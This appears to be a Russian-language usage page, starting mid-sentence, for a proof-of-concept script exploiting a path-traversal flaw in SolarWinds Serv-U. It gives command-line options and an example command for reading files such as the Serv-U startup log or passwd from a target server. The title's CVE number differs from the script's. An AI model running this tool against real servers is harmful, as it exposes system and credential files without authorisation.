
CVE-2024-28955 Эксплуатация PoC
15.4.2 или ниже).Для использования этого инструмента требуется установленный Python. Запустите скрипт с соответствующими аргументами:
python3 CVE-2024-28995.py -u <URL> [-d <Directory Path>] [-f <File Name>] [-w <Wordlist>]
-u, --url: URL для эксплуатации (обязательно).
-d, --dir: Путь к каталогу для чтения файлов (например, ProgramData/RhinoSoft/Serv-U/).
-f, --file: Файл для чтения (например, Serv-U-StartupLog.txt или passwd).
-w, --wordlist: Список слов для дополнительных путей для проверки.
Пример
python3 CVE-2024-28995.py -u http://example.com -d ProgramData/RhinoSoft/Serv-U/ -f Serv-U-StartupLog.txt



Ссылки
https://www.labs.greynoise.io/grimoire/2024-06-solarwinds-serv-u/